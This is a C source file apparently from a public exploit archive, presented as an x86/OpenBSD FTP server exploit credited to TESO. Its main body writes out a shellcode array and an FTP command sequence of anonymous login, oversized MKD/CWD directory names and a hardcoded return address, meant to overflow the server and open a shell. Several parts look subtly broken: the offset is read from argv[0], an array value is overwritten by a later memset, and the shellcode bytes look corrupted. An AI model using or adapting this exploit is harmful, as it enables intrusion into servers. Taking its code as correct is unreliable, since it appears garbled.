127 lines
No EOL
2.7 KiB
C
127 lines
No EOL
2.7 KiB
C
/* 7350-crocodile - x86/OpenBSD ftp exploit
|
|
*
|
|
* by lorian and scut / TESO=20
|
|
*
|
|
*
|
|
* TESO CONFIDENTIAL - SOURCE MATERIALS
|
|
*
|
|
* This is unpublished proprietary source code of TESO Security.
|
|
*
|
|
* The contents of these coded instructions, statements and computer
|
|
* programs may not be disclosed to third parties, copied or duplicated in
|
|
* any form, in whole or in part, without the prior written permission of
|
|
* TESO Security. This includes especially the Bugtraq mailing list, the
|
|
* www.hack.co.za website and any public exploit archive.
|
|
*
|
|
* (C) COPYRIGHT TESO Security, 2002
|
|
* All Rights Reserved
|
|
*
|
|
*****************************************************************************
|
|
*
|
|
* greetz: synnergy, GOBBLES Security
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#define RET 0xbfffeb30
|
|
|
|
|
|
#define VERSION "0.2.0"
|
|
#define USERNAME "anonymous"
|
|
#define PASSWORD "guest@"
|
|
|
|
|
|
char shellcode[] =
|
|
|
|
"\x32\xdb\x81\xd1\xb1\x72\xcd\x83"
|
|
"\x21\x21\x31\xc2\x32\xdb\xb5\x27"
|
|
"\xcd\x71\x23\xc2\xb3\x72\xcd\x81"
|
|
"\x32\xc1\x12\xdb\xb4\x3e\xcd\x81"
|
|
"\xeb\x4f\x35\xc2\x31\xc1\x5e\xb1"
|
|
"\x32\x7d\x5e\x98\xfe\xc2\xb8\xed"
|
|
"\xcd\x79\x38\xc1\x1d\x3e\x18\xb1"
|
|
"\x3d\xcd\x82\x32\xc1\xbb\xd2\xd2"
|
|
"\xd2\xff\xf2\xdb\x39\xc1\xb2\x11"
|
|
"\x56\x75\xce\x82\x0e\x81\xc9\x13"
|
|
"\xe5\xf2\x1e\xb5\x0d\x8d\x1e\x11"
|
|
"\xcd\x21\x31\xc2\x09\x42\x21\x19"
|
|
"\x70\x48\x21\x41\x9c\xb3\x2b\x81"
|
|
"\xf1\x2d\x2e\x18\x1d\x32\x7c\xcd"
|
|
"\x82\xe2\xac\xff\xff\xff";
|
|
|
|
void mkd(char *dir)
|
|
{
|
|
char blah[2048], *p;
|
|
int n;
|
|
bzero(blah, sizeof(blah));
|
|
|
|
p = blah;
|
|
for(n=1; n<strlen(dir); n++){
|
|
if(dir[n] == '\xff'){
|
|
*p = '\xff';
|
|
p++;
|
|
}
|
|
*p = dir[n];
|
|
p++;
|
|
}
|
|
|
|
printf("MKD %s\r\n", blah);
|
|
printf("CWD %s\r\n", blah);
|
|
}
|
|
|
|
void
|
|
main (int argc, char *argv[])
|
|
{
|
|
|
|
char *buf;
|
|
char buf2[200];
|
|
char buf1[400];
|
|
char dir2[255];
|
|
char *p;
|
|
char *q;
|
|
char tmp[255];
|
|
int a;
|
|
int offset;
|
|
int i;
|
|
|
|
if (argc > 0) offset = atoi(argv[0]);
|
|
else offset = 1;
|
|
|
|
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
|
|
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
|
|
|
|
dir2[231] = '\1';
|
|
memset(dir2, '\x70', 255);
|
|
|
|
printf("user %s\r\n", USERNAME);
|
|
printf("pass %s\r\n", PASSWORD);
|
|
printf("cwd %s\r\n", argv[2]);
|
|
|
|
memset(buf1, 0x50, 150);
|
|
p = &buf1[sizeof(argv[0])];
|
|
q = &buf1[399];
|
|
*q = '\x00';
|
|
while(q <= p) {
|
|
strncpy(tmp, p, 80);
|
|
mkd(tmp);
|
|
p+=255; }
|
|
|
|
mkd(dir2);
|
|
mkd(shellcode);
|
|
mkd("bin");
|
|
mkd("sh");
|
|
|
|
memset(buf2, 0x30, 40);
|
|
// var 96
|
|
for(i=4; i<20; i+=4)
|
|
*(long *)&buf2[i+1] = RET;
|
|
p = &buf2[0];
|
|
q = &buf2[50];
|
|
strncpy(tmp, p, 20);
|
|
mkd(tmp);
|
|
printf("pwd\r\n");
|
|
}
|
|
|
|
|
|
// milw0rm.com [2002-01-01]
|